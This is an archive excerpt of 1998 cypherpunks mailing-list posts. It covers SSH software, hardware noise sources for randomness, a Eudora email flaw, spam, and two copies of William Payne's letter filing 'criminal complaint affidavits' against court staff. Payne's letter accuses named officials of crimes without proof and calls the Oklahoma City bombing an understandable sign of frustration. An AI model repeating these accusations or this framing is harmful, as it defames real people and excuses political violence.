PGP Fingerprints:
99EB 330B B517 F5A3  CDD3 875D CDB6 8621 - 0x2A47CAAF
BCBF 8B61 551E 4A75 C3A7  9192 C158 0774 EB5A 746D - 0xEB5A746D

PGP encrypted mail preferred 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Thu, 6 Aug 1998 22:44:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Is there a freeware knockoff of SSH for win95
In-Reply-To: <199808070521.HAA17085@replay.com>
Message-ID: <3.0.5.32.19980806224358.03cd4330@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain


At 07:21 AM 8/7/98 +0200, Anonymous wrote:
>
>I'm looking for something to encrypt all of my web browsing while I am
>at work.  My work keeps a couple gigs devoted to a cache file in the
>proxy and I want to find a cheap way around that for my work. 
>Personally paying for Fsecure SSH is not worth it just for work.
>I would be wiiling to pay for an account at cyberpass.net for their
>ssh server but the software is way too much.

I would like to find any of the Win95 versions that immplement scp (Secure
Copy).

Look for a product called SecureCRT.  It has a 30 day trial period.

http://www.vandyke.com/ should have more info on it.
---
|      Bill Clinton - Bringing back the Sixties one Nixon at a time!     |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|                                                  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Enzo Michelangeli" <em@who.net>
Date: Thu, 6 Aug 1998 08:33:55 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: Noise source processing
Message-ID: <003801bdc14f$c2ec86e0$87004bca@home>
MIME-Version: 1.0
Content-Type: text/plain


-----Original Message-----
From: mgraffam@mhv.net <mgraffam@mhv.net>
Date: Thursday, August 06, 1998 10:17 AM


[[...]>The noise coming off of the sound card is more beige than white
though..
>
>Does anyone know of any papers, articles or whatever on good techniques to
>remove bias from the audio source?
>
>My initial thoughts are along the lines of just hashing everything, but
>this will be slow, and I'd like to see what other ideas are out there.

What about an analog filter placed before the digitizer? Nowadays there
should be inexpensive single-chip implementations of multiple-tap equalizers
made for consumer audio. You just have to straighten up the amplitude
ignoring the phase rotation, because the power spectrum is a real-codomain
function (being the Fourier Transform of the autocorrelation, which is an
even function). It won't be perfect, but it'll help.

Enzo








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bestoffer@thedorm.com
Date: Thu, 6 Aug 1998 23:43:53 -0700 (PDT)
To: bestoffer@thedorm.com
Subject: Zero Down Internet Opportunity!
Message-ID: <199808070643.XAA18999@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


$0 Down Internet Opportunity
*Complete Computer System
*E- Com web site package
*Tutorials- we'll teach you
* Earn BIG while you learn
Date: Thu, 6 Aug 98  23:13:00 +-400
Message-Id: <9808062313001989100@mail1>

For More Info:
602-735-3760





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 6 Aug 1998 21:43:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808070443.GAA08724@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


That all depends on the Anonymous you are talking to.
If I did this right It will come out of the remailer as TBM so I'm not
just another anonymous :)


---kryz <chrisharwig@hetnet.nl> wrote:
>
> Anonymous,
> 
> I reckon you're quite a tough person, am I right?
> 
> 

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 6 Aug 1998 21:50:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: whut up
Message-ID: <199808070450.GAA10167@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 6 Aug 1998 FRETELUCO@aol.com wrote:

> 
> looking for a place to have some Band stickers made, can you email me a phone
> number so we can check out some prices.....thanks TIm
> 
> 

Whut up dawg??? we be dim k-rad k3wl CyPhErPuNk d00dz!! we be havin' no
band stickerz. we be learning Ebonics (what it is, man!) so we can be
rappin' with looserz like you! What it is, man!

we be chargin' $99.99 of green to make deez band stickaz! What it is, man!

-- dim k-rad k3wl CyPhErPuNk d00dz





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 6 Aug 1998 22:21:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Is there a freeware knockoff of SSH for win95
Message-ID: <199808070521.HAA17085@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for something to encrypt all of my web browsing while I am
at work.  My work keeps a couple gigs devoted to a cache file in the
proxy and I want to find a cheap way around that for my work. 
Personally paying for Fsecure SSH is not worth it just for work.
I would be wiiling to pay for an account at cyberpass.net for their
ssh server but the software is way too much.


_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 7 Aug 1998 04:45:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Export Controls Revised
Message-ID: <199808071145.HAA13751@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


BXA published in the Federal Register today revisions
to the EAR to fit Wassenaar/Anti-terrorism controls:

   http://jya.com/bxa080798.txt

The changes show that the shift from global cold warfare 
to global anti-terrorism continues without diminution of 
national security terrorism. And crypto remains a terrifying 
threat to the natsec warriors aiming to maintain global 
snooping.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 7 Aug 1998 07:04:27 -0700 (PDT)
To: senatorlott@lott.senate.gov
Subject: Another criminal complaint affidavit
Message-ID: <35CB083D.44D0@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 8/7/98 7:43 AM

Art Morales

Let's hope the government gets these messed settled before they become
WORSE.

bill


Friday 8/7/98  7:30 AM
 
Certified   Return receipt requested 
 
Proctor Hug  Jr 
Chief Judge, Ninth Circuit 
50 West Liberty Street 
Reno, NV 89501-1948 
(702) 784-5631 
784-5166 fax 
 
Dear judge Hug: 
 
Purposes of this letter- criminal complaint affidavit are to 
 
1 file a criminal complaint affidavits against Ninth circuit Senior Case Expeditor Gwen Baptiste for  
   Obstruction of Justice, 
 
2  ask why not have not yet done your job. 
 
On 4/1/98 I forwarded to you criminal complaint affidavits for proper processing. 
 
In a hand-addressed envelope stamped CONFIDENTIAL with return address 
 
              CLERK, U.S. COURT OF APPEALS 
	P.O. BOX 547 
	SAN FRANCISCO, CA 94101-0547 
 
	OFFICIAL BUSINESS 
	PENALTY FOR PRIVATE USE, 300 
 
postmarked  SAN FRANCISCO, CALIF  APR 24 98 U.S. POSTAGE $2.62 METER 504753 
some returned the complaints to me. 
 
On May 5, 1998 I received the ATTACHED letter which states 
 
  Re: Complaint of Judicial Misconduct 
 
  We have received your complaint of judicial misconduct or disability.  It is being returned to you for 
  failure to comply with the Rules of the Judicial Counsel of the Ninth Circuit Governing Complaints 
  of Judicial Misconduct or Disability (Rules).  See Rule 3(d). ... 
 
  xx_A copy of these Rules is enclosed.  To understand the purpose of the procedure and who may be 
  complained about, please refer to Rules 1 and 2. ... 
 
  xx  Statement of facts exceed five pages  See Rule 2(b). ... 
 
  xx  Other.  Please complete the complaint form and return sufficient copies.  See attached Rules for  
  guidance.   Your complaint can only be against Article Three Judges. 
 
				Very truly yours, 
 
				signature 
 
				Gwen Baptiste 
				Senior Case Expeditor 
 
Judge Hug,  I am NOT filing a COMPLAINT OF JUDICIAL MISCONDUCT. 
 
I am filing CRIMINAL COMPLAINT AFFIDAVITS in accordance with procedures set forth in law. 
 
Our forefathers designed the criminal law system with the possibility in mind that a cabal of lawyers 
might band together in an attempt to prevent prosecution of one or more friends. 
 
Therefore, if local federal officials will not do their duty and prosecute for criminal activity IN WRITING , 
then a citizen has the right to seek and select a magistrate from another district. 
 
Most individuals would interpret the letter 
 
                              U.S. Department of Justice  
                              United States Attorney  
                              District of New Mexico  
                              Post Office Box 607 
                              Albuquerque, New Mexico 87103  
                                                                 505/766 3341 
                                                                 505/766 2868 
                                                                          FAX 505/766-8517 
                              May 19, 1997  
 
 
  Mr. William A. Payne  
  13015 Calle de Sandia, NE  
  Albuquerque, New Mexico 87111  
 
  Dear Mr. Payne:  
 
     My name is Robert J. Gorence. I am the First Assistant U.S. Attorney and the Chief of the Criminal    
  Division for the United States Attorney's Office for the District of New Mexico. I am in receipt of your  
  February 13, 1997 letter to Judge Frank John McGill as well as your September 20, 1996 Request for  
  Examination of Report Filed by a Judicial Officer. In your letter to Judge McGill, you assert on 
  page 2, paragraph 4 that you have filed a "criminal complaint affidavit" with Judge Bunton. On page 4 you  
  accuse Judge Paul Kelly of a felony. On page 8 you assert that you are waiting receipt of an arrest warrant for  
  Judge Kelly.  
 
     I do not understand the basis of your assertions. However, I will tell you that any attempt by you to privately  
  execute any type of "arrest warrant," against any member of the federal judiciary would constitute a violation  
  of 18 U.S.C.  1201 - Kidnaping, a felony which carries a potential of life imprisonment. Also, attempts on  
  your part to file private "criminal complaint affidavits" or "arrest warrants" regarding members of the federal  
  judiciary would constitute a violation of 18 U.S.C.  111 - Impeding a Federal Officer in the 
  Performance of Their Official Duties. I trust you will take my warnings seriously and that you will cease this  
  obstreperous conduct. If you do not, federal criminal charges will be filed against you.  
 
     Sincerely,  
 
     [Signature]  
 
     ROBERT J. GORENCE  
     First Assistant U.S. Attorney  
 
RJG/maf 
 
http://www.jya.com/whprjg.htm 
 
as an indication that justice would not be forthcoming from the New Mexico District Attorney's Office. 
 
Therefore, I sought external relief. 
 
 First with Judge Fern Smith, District of Northern California  on March 11, 1996. 
 
Smith along with Albuquerque FBI agent-in-charge Thomas Knier sent FBI agents to our home to attempt to 
threaten me.  
 
Next I sought relief from  J. Clifford Wallace, chief judge,  Ninth Circuit Court of Appeals on  July 9, 1996. 
 
Wallace received a criminal complaint affidavit on Knier on July 15, 1996 for sending FBI agents in an 
attempt to threaten me. 
  
Ms. Corina Orozco,  Deputy Clerk., Ninth Circuit Court of Appeals wrote me 
 
             August 15, 1996 
 
             This court is in receipt of you letters dated July 15, 1996. 
 
             If you wish to file an appeal in this court and seek 
             judicial relief you must first file an action in the U.S. 
             District Court. 
 
NO, judge Hug, I was filing CRIMINAL COMPLAINT AFFIDAVITS. 
 
Gwen Baptiste from the Office of  the Clerk, United States Court of Appeals for The Ninth Circuit, 
wrote on July 25, 1996 
 
                  Re: Complaint of Judicial Misconduct 
 
             We have received your complaint of judicial misconduct. 
             Pursuant to the Rules of the Judicial Council of the Ninth 
             Circuit Governing Complaints of Judicial Misconduct or 
             Disability, you complaint is being returned to you for 
             compliance with the above rules.  A copy of these rules is 
             enclosed.  To understand the purpose of the procedure and 
             who may be complaint about please refer to Rules 1 and 2. 
 
AGAIN, judge Hug, I am filing CRIMINAL COMPLAINT AFFIDAVITS not COMPLAINTS OF JUDICIAL  
MISCONDUCT.   
 
Judge Hug, I hope it is FINALLY CLEAR that I am filing CRIMINAL COMPLAINT AFFIDAVITS as 
I am entitled to do by law. 
 
Judge Hug, THE DOCUMENTS YOU SHOULD HAVE IN YOUR POSSESSION and you can 
view on Internet at http://www.jya.com/snlhit.htm show 
 
1  Criminal violations of the Privacy Act http://www.jya.com/hr105-37.txt 
    ATTACHED 11 pages beginning with Sandia National Laboratories 
    director  Michael Robles writing EEOC Director Charles Burtner. 
 
    A  I never saw the documents until Sandia employee Richard Gallegos gave me a copy in 1997.  
    B  Sandia denied that the documents existed.   
    C  The documents contain factually incorrect information.  I did NOTHING WRONG.  I followed all        
         Sandia procedures known to me and obtained all required Sandia approvals.
    D  I was never given an opportunity to defend myself.  http://jya.com/greene.htm  
    E  Neither Sandia nor EEOC had my permission in writing for release  of the information.  
 
2  A ATTACHED PERJURED SWORN affidavit by Sandia attorney Gregory Cone submitted 
of the court of New Mexico judge John Conway. 
 
             AFFIDAVIT OF GREGORY A. CONE 
 
             Gregory A. Cone, being duly sworn, deposes and states: 
 
             1. I am employed by Sandia Corporation.  I am an attorney 
             admitted to practice law in the State of California and before the 
             U. S. Patent and Trademark Office and concentrate on legal issues 
             related to patent and copyright law.  In that capacity, I am  
             familiar with activities at the Sandia National Laboratories 
             ("Sandia") as they related to what is sometimes referred to as 
             "reverse engineering." ... 
 
              It is the general view at Sandia that disassembly of "object 
             code" under such circumstances constitutes a "fair use" of 
             copyrighted software under 17 U.S.C. article 107 and is thus 
             permissible.  Sandia bases its view on Sega Enterprises v. 
             Accolade, Inc. 977 F.2d 1510, 24 U.S.P. Q. 2d 1561 (9th Cir. 
             1992), amended, 1993 U. S. App. LEXIS 78, and Atari Games Corp 
             v. Nintendo of America, Inc, 975 F.2d 832 (Fed. Cir.  
             1992) ... 
 
             FURTHER, Affidavit sayeth naught. 
                                  
                                 (signed) 
                                GREGORY A. CONE. 
 
             SUBSCRIBED, SWORN TO and ACKNOWLEDGED before me on this 12th 
             day of August, 1993, by Gregory A. Cone." 
                                                 (signed) 
                                                Mary A. Resnick 
 
                                                Notary Public 
 
             My Commission Expires: 
 
             2-7-94 
 
Lawyer Cone has citations reversed.  The  U. S. Patent Quarterly references the Atari v Nintendo lawsuit.   
1510 should be corrected to 1015. 
 
Judge Fern Smith  ruled in both cases: 
 
                The first two cases to directly address the issue of 
                intermediate copying both originated in California's 
                Northern District Court.  They are Atari v. Nintendo and 
                Sega v. Accolade.  In both cases, the district court  
                found that intermediate copying was NOT fair use. ... 
  
                In a strong opinion she [Fern Smith] wrote in March 1991, 
                when granting Nintendo's request for a preliminary 
                injunction against Atari, she lambasted Atari's lawyers for 
                thievery.  ... 
 
                However, both cases have been overruled on appeal. In the 
                ground-breaking Atari decision, the Federal Circuit held 
                that intermediate copying was a fair use.  The Sega 
                decision, which was appealed to the Ninth Circuit Court of 
                Appeals, similarly overruled the district court and held 
                that intermediate copying may be fair use. 
 
        The New Use of Fair Use:  Accessing Copyrighted Programs Through  
        Reverse Engineering, Stephen B. Maebius, Journal of the Patent and  
        Trademark Office Society, June 1993, 75, n6, p433 
 
Cone's affidavit attempts to create the appearance that  reverse engineering  I REFUSED to do for the FBI was  
legal before July 27, 1992, the date of  my firing.  
 
Decision of the appeal was apparently Decided SEPTEMBER 10, 1992.  Page 1016 from 24 USPQ 2d, Atari  
Games Corp.  v. Nintendo of America.  I was fired JULY 27, 1992! 
 
Lawyer Cone has under oath knowingly made a false material declaration before a court.   
 
Judge Hug, we just can't get the arrest warrant issued for Cone YET.  Or for those who violated the criminal 
sections of the Privacy Act 
 
Judges and clerks who are apparently are reluctant to properly proceed against other federal or federal contract 
employee are themselves committing crimes. 
 
Judge Hug, there is ONE SET OF LAWS in the United States of America.  Not a set of laws which applies to 
ordinary citizens and another which apply to judges, clerks, federal and federal contract employees. 
 
Rule 3 of the Federal Rules of Criminal Procedure, entitled the Complaint provides: 
 
              The complaint is a written statement of the essential  
	facts constituting the offense charged.  It shall be made  
	upon oath before a magistrate. 
 
As you may be aware, 
 
             An individual may "make a written complaint on oath before  
	an examining and committing magistrate, and obtain a warrant  
	of arrest."  This is in conformity with the Federal  
	Constitution, and "consonant with the principles of natural  
	justice and personal liberty found in the common law." 
 
        [United States v Kilpatrick (1883, DC NC) 16G 765, 769] 
 
You may also be aware, 
 
            A complaint though quite general in terms is valid if it 
            sufficiently apprises the defendant of the nature of the 
            offense with which he is charged. 
 
        [United States v Wood (1927, DC Tex) 26F2d 908, 910, affd 
        (CA5 Tex) 26 F2d 912. 
 
And for your edification, 
 
        The commission of a crime must be shown by facts positively 
        stated.  The oath or affirmation required is of facts and 
        not opinions or conclusion. 
 
        [United States ex rel. King v Gokey (1929, DC NY) 32 F2d 
        793, 794] 
 
        The complaint must be accompanied by an oath. 
 
        [Re Rules of Court (1877, CC Ga) 3 Woods 502, F Cas No 
        12126] 
 
        A complaint must be sworn to before a commissioner or other 
        officer empowered to commit persons charged with offenses 
        against the United States. 
 
        [United States v Bierley ( 1971, WD Pa) 331 F Supp 1182] 
 
Such office is now called a magistrate. 
 
        A complaint is ordinarily made by an investigating officer 
        or agent, and where private citizens seek warrants of 
        arrest, the practice recommended by the Judicial Conference 
        of the United States is to refer the complaint to the United 
        States Attorney.  However, further reference to him is 
        rendered futile where a mandamus proceeding is brought to 
        compel him to prosecute and he opposes the proceeding. 
 
        [Pugach v Klein (1961, SD NY) 193 F Supp 630, citing Manual 
        for United States Commissioners 5 (1948)] 
 
Any attempt to bring criminal complaints to government authorities  
would, of course, be as evidenced by Gorrence's letter http://www.jya.com/whprjg.htm . 
 
I am a citizen of the United States and you are the assigned  
magistrate. 
 
        In order to satisfy the requirement of the Constitution  
        and Rules 3 and 4, a written and sworn complaint should set 
        forth the essential facts constituting the offense charged 
        and also facts showing that the offense was committed and 
        that the defendant committed it. 
 
And, 
 
        As to the requirement that the complaint be made on personal 
        knowledge of the complainant, it is enough for the issuance 
        of a warrant that a complainant shows it to be on the 
        knowledge of the complainant. 
 
        [Giordenello v United States (1958) 357 US 480, 2 L Ed. 2d 
        1503, 78 S Ct 1245, rev. (Ca5 Tx) 241 F2d 575, 579 in accord 
        Rice v Ames (1901) 180 US 371, 45 L Ed 577, 21 S ct 406, and 
        United States v Walker, (1952, CA2 NY) 197 F 2d 287, 289, 
        cert den 344 US 877, 97 L Ed 679, 73 S Ct 172] 
 
So as to keep contiguous the requirements of the law and the criminal  
complaint affidavits, I will include this complaint in this letter  
to you. 
 
CRIMINAL COMPLAINT AFFIDAVIT: Gwen Baptiste 
 
Essential material facts are: 
 
1 July 25, 1996 Gwen Baptiste improperly returns criminal complaint affidavits properly forwarded to  
Ninth Circuit judge J Clifford Wallace. 
 
2 May 5, 1998  Bapitist repeats return of criminal complaint affidavits properly sent to judge Proctor Hug  Jr. 
 
COUNT 1 
 
3  Ninth circuit Senior Case Expeditor Gwen Baptiste  is charged with REPEATED INTENTIONAL  
MACLIOUS Obstruction of Justice, 18 USC 1512, (b) and (c).  
 
Title 18 Obstruction of Justice, Article  1512, as amended, states 
 
             Tampering with a witness, victim, or an informant 
 
             (b) Whoever knowingly uses intimidation ...  
	     threatens, ... or engages in misleading conduct toward  
	     another person with intent to - 
 
             (3) hinder, delay or prevent the communication to a law 
             enforcement officer or judge of the United States of 
             information relating to the commission or possible 
             commission of a Federal offense ... 
 
             (c) Whoever intentionally harasses another person and  
	     thereby hinders, delays, prevents, or dissuades any  
	     person from -  
 
             (1) reporting to a law enforcement or judge of the United 
             States the commission or possible commission of a Federal 
             offense ... 
 
             or attempts to do so, shall be fined under this title or imprisoned ... 
				 
for Baptiste's TWO attempts to convince citizen Payne to file a judicial misconduct complaint 
when Payne was filing CRIMINAL COMPLAINT AFFIDAVITS. 
 
              VERIFICATION 
 
              Under penalty of perjury as provided by law, the  
	undersigned certifies pursuant to 28 USC section 1746  
	that material factual statements set forth in this  
	criminal complaint are true and correct, except as to  
	any matters therein stated to be information and belief  
	of such matters the undersigned certifies as aforesaid  
	that the undersigned verily believes the same to be true. 
 
 
 
 
             Date                     William H. Payne 
        			 13015 Calle de Sandias NE 
                                          Albuquerque, NM 87111 
                                          505-292-7037 
  
Judge Hug, many citizens are becoming disgusted with government misconduct.  Something must 
be done to correct this. 
 
One example is of government misconduct is how the Department of Justice handled the case of a citizen  
ACCUSED of a federal firearm violation. http://www.monumental.com/SkyWriter/WacoMuseum/ 
 
Displeasure with the way the government handled to bring the ACCUSED to justice led to an 
unfortunate display of dissatisfaction.  ARTICLES RELATED TO OKLAHOMA CITY BOMBING   
http://www.aci.net/kalliste/  
 
Tenth circuit court clerks and judges violated their own rules denying court wins to citizen Morales and 
myself.  Senator Orrin Hatch improperly processed a judicial misconduct complaint against New Mexico
judge John Conway. http://www.jya.com/whp071598.htm

These two acts mostly caused Morales and me AND OTHERS to reveal additional unfortunate decisions by
factions within the US government in the hope PROMPT SETTLEMENT will bring relief. 
http://www.aci.net/kalliste/speccoll.htm   http://caq.com/cryptogate  http://jya.com/whpfiles.htm   
 
We seeks changes within the law so as to avoid future citizen frustration of our government and legal system 
not working properly.   
 
And possible unacceptable, but understandable, future expressions of frustrations of government employees not  
obeying the law. 
 
WRITTEN EVIDENCE both in document copies and on Internet is so BLATANT that crimes have been  
committed. 
 
 I ask that you do you job and issue the warrants of arrest.  Or write me and tell me why you cannot. 
 
I ask that you respond within 30 days. 
 
No response is an invalid response.  As  accused felon former chief judge J Clifford Wallace may 
now know. 
 
Sincerely, 
 
 
 
William H. Payne 
13015 Calle de Sandias NE 
Albuquerque, NM 87111 
 
Distribution 
 
Antoin Scalia   http://www.jya.com/whpscalia.htm   Certified Return receipt requested 
http://www.senate.gov/committee/judiciary.html



9






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Fri, 7 Aug 1998 03:11:03 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Family TV station shows 5 hrs XXX porn/Skimpy barmaids down under
Message-ID: <19980807080000.8860.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/7/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Enzo Michelangeli" <em@who.net>
Date: Thu, 6 Aug 1998 17:53:17 -0700 (PDT)
To: <honig@sprynet.com>
Subject: Re: Noise source processing
Message-ID: <00be01bdc19d$e74dbe20$88004bca@home>
MIME-Version: 1.0
Content-Type: text/plain


-----Original Message-----
From: mgraffam@mhv.net <mgraffam@mhv.net>
Date: Friday, August 07, 1998 4:14 AM


>> Interestingly, the parity of a $10 10year old Radio shack monophonic
>> FM radio, UNSHIELDED, in a digitally-noisy environment, sampled
>> at 44Khz and 16 bits, passed Diehard.
>
>Yeah, that is pretty neat .. maybe I'll tear the shielding off of my
>source and see what sort of results I get. Maybe the shielding I
>put in place is unnecessary.


Hmmm... IMHO, it just means that you can't rely on statistic tests
alone in order to measure entropy content. In fact, you can't measure it at
all: you can only set upper bounds, but, sadly, no lower bounds.
Remember: also pi's digits would pass DIEHARD, and an external attacker
could well inject such kind of EMI into an unshielded receiver.

Enzo






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Enzo Michelangeli" <em@who.net>
Date: Thu, 6 Aug 1998 17:53:22 -0700 (PDT)
To: <honig@sprynet.com>
Subject: Re: Noise source processing
Message-ID: <00bf01bdc19d$eb2c09c0$88004bca@home>
MIME-Version: 1.0
Content-Type: text/plain


-----Original Message-----
From: David Honig <honig@sprynet.com>
Date: Friday, August 07, 1998 1:58 AM


>>What about an analog filter placed before the digitizer?
>
>The engineering issue is this: no matter how great you filter out
>the junk, you don't have a perfect analog measurement to start with.
>(Note that filtering out junk reduces info content).

Well, linear analog filters are reversible, so, by themselves, they neither
destroy nor create information. In practice they may add some noise of their
own, drowning the original signal, but in our case this is good, not bad :-)

The relationship between entropy and reversibility is a deep one, of course.
That's also why reversible computing can, among other things, reduce the
power consumption without any theoretical limit.

Enzo







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 7 Aug 1998 07:53:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Eudora Flaw
Message-ID: <199808071453.KAA00807@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Markoff reports in today's NY Times on Eudora's e-mail 
security flaw:


http://www.nytimes.com/library/tech/yr/mo/biztech/articles/07email-code.html

It's the feature which allows clicking on a URL in a message,
which can run an attached malicious program, or otherwise trash
a user's disk.

A fix is due out this afternoon from Qualcomm. In the meantime NYT
says the flaw can be fixed by going to "Options," "Viewing Mail" and 
turning off "Use Microsoft's viewer."

Security experts are quoted: beware any attachment to E-mail, 
and not just for Eudora.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Fri, 7 Aug 1998 11:22:29 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 7, 1998
Message-ID: <199808071802.NAA22380@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/  for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 7 Aug 1998 19:55:28 -0700 (PDT)
To: j orlin grabbe <senator@torricelli.senate.gov
Subject: Berlin Diaries, 1940-1945
Message-ID: <35CBBCF7.1CD0@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 8/7/98 8:10 PM

J Orlin Grabbe  http://www.aci.net/kalliste/

The Great Crash by John Kenneth Galbraith pointed out that the crash did
not come
with one catastrophic plunge.

Rather the market, lowered, many thinking this was the bottom,
reinvested.

The market lowered again.

This cycle, Galbraith pointed out, was repeated until about everyone was
broke.
http://www.cib.org.uk/eng/alinks/a000769.htm

About corrupt courts, EVEN the Nazi's were finally so horrified by what
happened after
the assassination attempt on Hitler the Nazi's even became appalled.  

A GREAT BOOK about this was written 

                     Berlin Diaries, 1940-1945
                     by Marie Vassiltchikov 
                     
                    
Later
bill


Friday 8/7/98  7:30 AM
 
Certified   Return receipt requested 
 
Proctor Hug  Jr 
Chief Judge, Ninth Circuit 
50 West Liberty Street 
Reno, NV 89501-1948 
(702) 784-5631 
784-5166 fax 
 
Dear judge Hug: 
 
Purposes of this letter- criminal complaint affidavit are to 
 
1 file a criminal complaint affidavits against Ninth circuit Senior Case Expeditor Gwen Baptiste for  
   Obstruction of Justice, 
 
2  ask why not have not yet done your job. 
 
On 4/1/98 I forwarded to you criminal complaint affidavits for proper processing. 
 
In a hand-addressed envelope stamped CONFIDENTIAL with return address 
 
              CLERK, U.S. COURT OF APPEALS 
	P.O. BOX 547 
	SAN FRANCISCO, CA 94101-0547 
 
	OFFICIAL BUSINESS 
	PENALTY FOR PRIVATE USE, 300 
 
postmarked  SAN FRANCISCO, CALIF  APR 24 98 U.S. POSTAGE $2.62 METER 504753 
some returned the complaints to me. 
 
On May 5, 1998 I received the ATTACHED letter which states 
 
  Re: Complaint of Judicial Misconduct 
 
  We have received your complaint of judicial misconduct or disability.  It is being returned to you for 
  failure to comply with the Rules of the Judicial Counsel of the Ninth Circuit Governing Complaints 
  of Judicial Misconduct or Disability (Rules).  See Rule 3(d). ... 
 
  xx_A copy of these Rules is enclosed.  To understand the purpose of the procedure and who may be 
  complained about, please refer to Rules 1 and 2. ... 
 
  xx  Statement of facts exceed five pages  See Rule 2(b). ... 
 
  xx  Other.  Please complete the complaint form and return sufficient copies.  See attached Rules for  
  guidance.   Your complaint can only be against Article Three Judges. 
 
				Very truly yours, 
 
				signature 
 
				Gwen Baptiste 
				Senior Case Expeditor 
 
Judge Hug,  I am NOT filing a COMPLAINT OF JUDICIAL MISCONDUCT. 
 
I am filing CRIMINAL COMPLAINT AFFIDAVITS in accordance with procedures set forth in law. 
 
Our forefathers designed the criminal law system with the possibility in mind that a cabal of lawyers 
might band together in an attempt to prevent prosecution of one or more friends. 
 
Therefore, if local federal officials will not do their duty and prosecute for criminal activity IN WRITING , 
then a citizen has the right to seek and select a magistrate from another district. 
 
Most individuals would interpret the letter 
 
                              U.S. Department of Justice  
                              United States Attorney  
                              District of New Mexico  
                              Post Office Box 607 
                              Albuquerque, New Mexico 87103  
                                                                 505/766 3341 
                                                                 505/766 2868 
                                                                          FAX 505/766-8517 
                              May 19, 1997  
 
 
  Mr. William A. Payne  
  13015 Calle de Sandia, NE  
  Albuquerque, New Mexico 87111  
 
  Dear Mr. Payne:  
 
     My name is Robert J. Gorence. I am the First Assistant U.S. Attorney and the Chief of the Criminal    
  Division for the United States Attorney's Office for the District of New Mexico. I am in receipt of your  
  February 13, 1997 letter to Judge Frank John McGill as well as your September 20, 1996 Request for  
  Examination of Report Filed by a Judicial Officer. In your letter to Judge McGill, you assert on 
  page 2, paragraph 4 that you have filed a "criminal complaint affidavit" with Judge Bunton. On page 4 you  
  accuse Judge Paul Kelly of a felony. On page 8 you assert that you are waiting receipt of an arrest warrant for  
  Judge Kelly.  
 
     I do not understand the basis of your assertions. However, I will tell you that any attempt by you to privately  
  execute any type of "arrest warrant," against any member of the federal judiciary would constitute a violation  
  of 18 U.S.C.  1201 - Kidnaping, a felony which carries a potential of life imprisonment. Also, attempts on  
  your part to file private "criminal complaint affidavits" or "arrest warrants" regarding members of the federal  
  judiciary would constitute a violation of 18 U.S.C.  111 - Impeding a Federal Officer in the 
  Performance of Their Official Duties. I trust you will take my warnings seriously and that you will cease this  
  obstreperous conduct. If you do not, federal criminal charges will be filed against you.  
 
     Sincerely,  
 
     [Signature]  
 
     ROBERT J. GORENCE  
